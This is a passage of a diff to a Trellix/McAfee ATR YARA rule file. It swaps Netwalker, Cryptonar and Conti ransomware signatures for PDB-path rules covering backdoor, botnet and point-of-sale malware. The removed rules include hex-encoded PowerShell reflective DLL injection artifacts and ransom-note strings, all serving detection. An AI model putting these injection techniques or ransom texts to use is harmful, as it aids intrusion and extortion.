?85??0F84????????8B??????85??0F84????????53E8????????8B??????????FF??83??????8B??74??E8????????FF????8B??????????FF??89??????E8????????8D??????516A??8B??????????8D??????516A??57FF??85??74??8B??????89????83????74??E8????????8B??????????FF??2B??3D????????77??83??????75??5B5F5E8B??5D83????C3BD????????5B5F5E8B??5D83????C35F5E33??5D83????C383????558B??????85??0F84????????5333??5733??89??????89??????E8????????8D??????518D??????8B??????????5157576A??FF????FF??85??0F85????????E8????????8B??????????FF??3D????????0F85????????FF??????E8????????83????89??????85??0F84????????56E8????????8D??????518D??????8B??????????51FF??????FF??????6A??FF????FF??85??74??33??39??????76??8B??????0F1F??????????E8????????8B??????68????????FF????8B??????????FF??FF??89??????8D????????????5053E8????????8B??83????85??74??FF??????68????????E8????????83????89????474683????3B??????72??8B??????FF??????E8????????83????85??74??85??74??E8????????6A??6A??538B??????????57FF??33??85??74??E8????????FF????8B??????????FF??463B??72??53E8????????83????5EE8????????8D??????516A??FF????8B??????????FF??5F5B85??74??8D??????50FF????E8????????83????E8????????FF????8B??????????FF??55E8????????83????33??5D83????C2????CCCCCCCCCCCCCCCCCCCCCCCC83????568B??????85??74??E8????????8D??????516A??8B??????????56FF??85??74??8D??????5056E8????????83????E8????????568B??????????FF??33??5E83????C2????CCCCCCCCCCCC83????83????????????5356570F84????????A1????????83??????0F84????????55E8????????68????????6A??6A??8B??????????FF??8B??89??????85??0F84????????660F1F????????????C7??????????????C7??????????????C7??????????????E8????????8D??????518D??????8B??????????518D??????516A??6A??6A??6A??55FF??85??0F85????????E8????????8B??????????FF??3D????????0F85????????FF??????E8????????83????89??????85??0F84????????E8????????8B??????8D??????518D??????8B??????????518D??????51FF??????566A??6A??55FF??85??0F84????????33??33??89??????39??????0F86????????0F1F??????????FF??E8????????83????85??75??FF????E8????????83????85??74??E8????????68????????FF??8B??????????55FF??89??????85??74??6A??E8????????8B??83????85??74??8B??????8D????????????5189????8B??????5389????E8????????8B??83????85??74??5568????????E8????????83????89????478B??????8B??????83????4089??????3B??????0F82????????85??74??85??74??E8????????6A??6A??538B??????????57FF??33??85??74??0F1F????E8????????FF????8B??????????FF??463B??72??53E8????????83????FF??????E8????????83????E8????????68????????8B??????????FF??E9????????5D5F5E33??5B83????C2????CCCCCC83????53558B??????565785??0F84????????8B????8D??????516A??55C7??????????????FF????85??0F88????????8B??????8D??????C7??????????????52508B??FF????85??0F88????????6A??8D??????6A??50E8????????33??83????B8????????66????????39??????0F8E????????8B??????8D??????5083????C7??????????????438B??89??????0F10??????8B??510F11??FF????85??0F88????????8B??????8D??????C7??????????????52508B??FF????85??0F88????????8B??????8D??????C7??????????????33??52508B??FF????83????????0F84????????FF??????E8????????83????85??0F85????????8B??????8D??????89??????52508B??FF????85??0F88????????8B??????8D??????89??????52508B??FF????85??0F88????????8B??????8D??????89??????52508B??FF????85??0F88????????33?? } - $pattern3 = { CCCCCCCCCC558B??FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF?????????? } + $pdb = "\\Utilities\\130ijkfv.o4g\\Desktop\\Desktop.OptChecker\\bin\\Release\\ BooZaka.Opt" condition: - uint16(0)==0x5a4d and any of ($pattern*) + uint16(0)==0x5a4d and filesize <800KB and any of them } -import "pe" - -rule TRELLIX_ARC_Netwalker_Signed : FILE +rule TRELLIX_ARC_Backdoor_Kankan_Pdb : BACKDOOR FILE { meta: - description = "Rule to detect Netwalker ransomware digitally signed." + description = "Rule to detect kankan PDB" author = "Marc Rivero | McAfee ATR Team" - id = "6806b917-2e02-57e3-887a-b4c12db83653" - date = "2020-03-30" - modified = "2020-11-20" - reference = "https://www.ccn-cert.cni.es/comunicacion-eventos/comunicados-ccn-cert/9802-publicado-un-informe-de-codigo-danino-sobre-netwalker.html" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_netwalker.yar#L30-L47" + id = "6910ecc7-3c31-569b-a7ff-2dcbccff88f9" + date = "2013-08-01" + modified = "2020-08-14" + reference = "https://threatpoint.checkpoint.com/ThreatPortal/threat?threatType=malwarefamily&threatId=650" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_backdoor_kankan_pdb.yar#L1-L27" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "d78ed22771d7c93516375afb8fd2fd7baa40a357ec3c247939a10d11f80ae226" + hash = "73f9e28d2616ee990762ab8e0a280d513f499a5ab2cae9f8cf467701f810b98a" + logic_hash = "3d2e45631dfca0e76e98eee4bb5c4ce1631906f497c052d8c41cc37637cb2760" score = 75 quality = 70 - tags = "FILE" - note = "The rule will hit also some Dridex samples digitally signed" + tags = "BACKDOOR, FILE" + rule_version = "v1" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Kankan" + actor_type = "Cybercrime" + actor_group = "Unknown" + + strings: + $pdb = "\\Projects\\OfficeAddin\\INPEnhSvc\\Release\\INPEnhSvc.pdb" + $pdb1 = "\\Projects\\OfficeAddin\\OfficeAddin\\Release\\INPEn.pdb" + $pdb2 = "\\Projects\\OfficeAddinXJ\\VOCEnhUD\\Release\\VOCEnhUD.pdb" condition: - uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "/CN=EWBTCAXQKUMDTHCXCZ" and pe.signatures[i].serial=="17:16:bb:93:fb:a9:a2:41:ba:a8:2e:c7:5e:ff:0c" or pe.signatures[i].thumbprint=="a4:28:e9:4a:61:3a:1f:cf:ff:08:bf:e7:61:51:64:31:1a:6f:87:bc") + uint16(0)==0x5a4d and filesize <500KB and any of them } -import "pe" - -rule TRELLIX_ARC_Netwalker : RANSOMWARE FILE +rule TRELLIX_ARC_Malw_Cutwail_Pdb : BOTNET FILE { meta: - description = "Rule based on code overlap in RagnarLocker ransomware" - author = "McAfee ATR team" - id = "80097a40-534a-5e1b-8fde-e4d832d76698" - date = "2020-06-14" - modified = "2020-11-20" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_netwalker.yar#L49-L75" + description = "Rule to detect cutwail based on the PDB" + author = "Marc Rivero | McAfee ATR Team" + id = "62058ff9-acb5-5f71-b6bb-4c64e51442ba" + date = "2008-04-16" + modified = "2020-08-14" + reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/CUTWAIL" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_cutwail.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "8c56ebed9e097d294045de46942c708da9ba7e01475dcecb0c3d41fcc8004780" + hash = "d702f823eefb50d9ea5b336c638f65a40c2342f8eb88278da60aa8a498c75010" + logic_hash = "f53626e6085509ddf9268b69e54a138e64cd5d3fbad119e6e9473179decd7927" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "BOTNET, FILE" rule_version = "v1" - malware_type = "ransomware" + malware_type = "botnet" + malware_family = "Botnet:W32/Cutwail" + actor_type = "Cybercrime" actor_group = "Unknown" strings: - $0 = {C88BF28B4330F76F3803C88B434813F2F76F2003C88B433813F2F76F3003C88B434013F2F76F2803C88B432813F2F76F4003C8894D6813F289756C8B4338F76F388BC88BF28B4328F76F4803C88B434813F2F76F2803C88B433013F2F76F400FA4CE} - $1 = {89542414895424108BEA8BDA8BFA423C22747C3C5C75588A023C5C744F3C2F744B3C2274473C6275078D5702B008EB3F3C6675078D5302B00CEB343C6E75078D5502B00AEB293C72750B8B542410B00D83C202EB1A3C74750B8B542414B00983C2} - $2 = {C8894D7013F28975748B4338F76F408BC88BF28B4340F76F3803C88B433013F2F76F4803C88B434813F2F76F3003C8894D7813F289757C8B4348F76F388BC88BF28B4338F76F4803C88B434013F2F76F400FA4CE} - $3 = {C07439473C2F75E380FB2A74DEEB2D8D4ABF8D422080F9190FB6D80FB6C28AD60F47D88AC6042080EA410FB6C880FA190FB6C60F47C83ACB754B46478A1684D2} - $4 = {8B433013F2F76F0803C88B432013F2F76F1803C88B0313F2F76F3803C88B430813F2F76F3003C88B433813F2F72F03C8894D3813F289753C8B4338F76F088BC8} - $5 = {F73101320E32213234329832E3320C332D334733643383339133A833BD33053463347C34543564358335AE36C3362937E9379A39BA390A3A203A443A183B2B3B} - $6 = {8B431813F2F76F4803C88B432813F2F76F3803C88B434013F2F76F200FA4CE0103C903C88B432013F2F76F4003C88B433013F2F76F3003C8894D6013F2897564} + $pdb = "\\0bulknet\\FLASH\\Release\\flashldr.pdb" condition: - uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and all of them + uint16(0)==0x5a4d and filesize <440KB and any of them } -import "pe" - -rule TRELLIX_ARC_Win_Netwalker_Reflective_Dll_Injection_Decoded : RANSOMWARE +rule TRELLIX_ARC_Kartoxa_Malware_Pdb : POS FILE { meta: - description = "Rule to detect Reflective DLL Injection Powershell Script dropping Netwalker, after hexadecimal decoded and xor decrypted " - author = "McAfee ATR Team" - id = "9562c0b9-e7ac-5b96-99cc-1df91cb617af" - date = "2020-05-28" - modified = "2020-11-20" - reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/ | https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_netwalker.yar#L77-L140" + description = "Rule to detect Kartoxa POS based on the PDB" + author = "Marc Rivero | McAfee ATR Team" + id = "3d2dbf22-5d8f-5f19-9048-2d021ada22c8" + date = "2010-10-09" + modified = "2020-08-14" + reference = "https://securitynews.sonicwall.com/xmlpost/guatambu-new-multi-component-infostealer-drops-kartoxa-pos-malware-apr-08-2016/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_backdoor_katorxa_pdb.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "fd29001b8b635e6c51270788bab7af0bb5adba6917c278b93161cfc2bc7bd6ae" - logic_hash = "e99c045f39e7933e877a4df7793aa5ea6be5a782bb079419501929ba99844dec" + hash = "86dd21b8388f23371d680e2632d0855b442f0fa7e93cd009d6e762715ba2d054" + logic_hash = "6e1810af386f3aada4cd1d72f76d8210d201808c8fe1d21d379ff1a825d93710" score = 75 - quality = 30 - tags = "RANSOMWARE" + quality = 70 + tags = "POS, FILE" rule_version = "v1" - malware_type = "ransomware" + malware_type = "pos" + malware_family = "Pos:W32/Kartoxa" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $api0 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 20 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 41 6c 6c 6f 63 22 29 5d } - $api1 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 22 29 5d } - $api2 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 4c 6f 61 64 4c 69 62 72 61 72 79 41 22 29 5d } - $api3 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 57 72 69 74 65 50 72 6f 63 65 73 73 4d 65 6d 6f 72 79 22 29 5d } - $api4 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 46 72 65 65 22 29 5d } - $api5 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 22 29 5d } - $api6 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 6c 6f 73 65 48 61 6e 64 6c 65 22 29 5d } - $api7 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 3d 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 41 6c 6c 6f 63 45 78 22 29 5d } - $api8 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 3d 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 45 78 22 29 5d } - $api9 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 4f 70 65 6e 50 72 6f 63 65 73 73 22 29 5d } - $api10 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 22 29 5d } - $artifact0 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 22 29 5d } - $artifact1 = { 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 50 74 72 54 6f 53 74 72 75 63 74 75 72 65 } - $artifact2 = { 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 52 65 61 64 49 6e 74 31 36 } - $artifact3 = { 65 6e 76 3a 57 49 4e 44 49 52 5c 73 79 73 77 6f 77 36 34 5c 77 69 6e 64 6f 77 73 70 6f 77 65 72 73 68 65 6c 6c 5c 76 31 2e 30 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 22 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 65 78 65 63 20 62 79 70 61 73 73} - $artifact4 = { 65 6e 76 3a 57 49 4e 44 49 52 5c 73 79 73 77 6f 77 36 34 5c 77 69 6e 64 6f 77 73 70 6f 77 65 72 73 68 65 6c 6c 5c 76 31 2e 30 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 22 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 65 78 65 63 20 62 79 70 61 73 73 20 2d 66 69 6c 65} - $artifact5 = {5b 50 61 72 61 6d 65 74 65 72 28 50 6f 73 69 74 69 6f 6e 20 3d 20 30 20 2c 20 4d 61 6e 64 61 74 6f 72 79} - $artifact6 = {5b 50 61 72 61 6d 65 74 65 72 28 50 6f 73 69 74 69 6f 6e 20 3d 20 31 20 2c 20 4d 61 6e 64 61 74 6f 72 79} - $artifact7 = {2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 42 79 50 61 73 73 20 2d 4e 6f 4c 6f 67 6f 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 4e 6f 45 78 69 74} - $artifact8 = {72 65 74 75 72 6e 20 5b 42 69 74 43 6f 6e 76 65 72 74 65 72 5d 3a 3a 54 6f 49 6e 74 36 34} + $pdb = "\\vm\\devel\\dark\\mmon\\Release\\mmon.pdb" condition: - 6 of ($api*) or ((3 of ($artifact*))) + uint16(0)==0x5a4d and filesize <200KB and any of them } -rule TRELLIX_ARC_Cryptonar_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_Shifu : FINANCIAL { meta: - description = "Rule to detect CryptoNar Ransomware" - author = "Marc Rivero | McAfee ATR Team" - id = "0911250f-fc1f-58bc-ac09-d77d2a2ed3ce" + description = "No description has been set in the source file - Trellix ARC" + author = "McAfee Labs" + id = "81e9ad25-1df0-5196-be8b-1d1d5d8e4387" date = "2024-09-01" modified = "2020-08-14" - reference = "https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_CryptoNar.yar#L1-L36" + reference = "https://blogs.mcafee.com/mcafee-labs/japanese-banking-trojan-shifu-combines-malware-tools/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_Shifu.yar#L1-L24" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "04c1c4f45ad3552aa0876c3b645c6ca92493018f7fdc5d9d9ed26cf67199d21b" + logic_hash = "dfa6165f8d2750330c71dedbde293780d2bb27e8eb3635e47ca770ff7b9a9d63" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" - malware_type = "ransomware" - malware_family = "Ransom:W32/CryptoNar" + tags = "FINANCIAL" + malware_type = "financial" + malware_family = "Backdoor:W32/Shifu" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $s1 = "C:\\narnar\\CryptoNar\\CryptoNarDecryptor\\obj\\Debug\\CryptoNar.pdb" fullword ascii - $s2 = "CryptoNarDecryptor.exe" fullword wide - $s3 = "server will eliminate the key after 72 hours since its generation (since the moment your computer was infected). Once this has " fullword ascii - $s4 = "Do not delete this file, else the decryption process will be broken" fullword wide - $s5 = "key you received, and wait until the decryption process is done." fullword ascii - $s6 = "In order to receive your decryption key, you will have to pay $200 in bitcoins to this bitcoin address: [bitcoin address]" fullword ascii - $s7 = "Decryption process failed" fullword wide - $s8 = "CryptoNarDecryptor.KeyValidationWindow.resources" fullword ascii - $s9 = "Important note: Removing CryptoNar will not restore access to your encrypted files." fullword ascii - $s10 = "johnsmith987654@tutanota.com" fullword wide - $s11 = "Decryption process will start soon" fullword wide - $s12 = "CryptoNarDecryptor.DecryptionProgressBarForm.resources" fullword ascii - $s13 = "DecryptionProcessProgressBar" fullword wide - $s14 = "CryptoNarDecryptor.Properties.Resources.resources" fullword ascii + $b = "RegCreateKeyA" + $a = "CryptCreateHash" + $c = {2F 00 63 00 20 00 73 00 74 00 61 00 72 00 74 00 20 00 22 00 22 00 20 00 22 00 25 00 73 00 22 00 20 00 25 00 73 00 00 00 00 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 00 72 00 75 00 6E} + $d = {53 00 6E 00 64 00 56 00 6F 00 6C 00 2E 00 65 00 78 00 65} + $e = {52 00 65 00 64 00 69 00 72 00 65 00 63 00 74 00 45 00 58 00 45} condition: - ( uint16(0)==0x5a4d and filesize <2000KB) and all of them + all of them } -import "pe" - -rule TRELLIX_ARC_Ransom_Conti : RANSOMWARE FILE +rule TRELLIX_ARC_MALWARE_Blackpos_Pdb : POS FILE { meta: - description = "Conti ransomware is havnig capability too scan and encrypt oover the network" - author = "McAfee ATR team" - id = "8fc6943d-fb99-5957-929b-4c264d9fba2d" - date = "2020-07-09" - modified = "2020-10-12" - reference = "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/Ransom_Conti.yar#L3-L37" + description = "BlackPOS PDB" + author = "Marc Rivero | McAfee ATR Team" + id = "f37e1522-49c4-5369-bc2c-33b070e9eae7" + date = "2014-01-24" + modified = "2020-08-14" + reference = "https://en.wikipedia.org/wiki/BlackPOS_Malware" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_blackpos_pdb.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe" - logic_hash = "953471c130309bbc712197d49d2072bd45838f49d2b25f86273a15c6baa87354" + hash = "5a963e8aca62f3cf5872c6bff02d6dee0399728554c6ac3f5cb312b2ba7d7dbf" + logic_hash = "d8f3fa380ca15f0fae432849b8c16cb8a0a9d1427d3e72fbf89cbbd63b0849c9" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "POS, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Conti" + malware_type = "pos" + malware_family = "Pos:W32/BlackPos" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $string1 = "HOW_TO_DECRYPTP" fullword ascii - $string2 = "The system is LOCKED." fullword ascii - $string3 = "The network is LOCKED." fullword ascii - $code1 = { ff b4 b5 48 ff ff ff 53 ff 15 bc b0 41 00 85 c0 } - $code2 = { 6a 02 6a 00 6a ff 68 ec fd ff ff ff 76 0c ff 15 } - $code3 = { 56 8d 85 38 ff ff ff 50 ff d7 85 c0 0f 84 f2 01 } + $pdb = 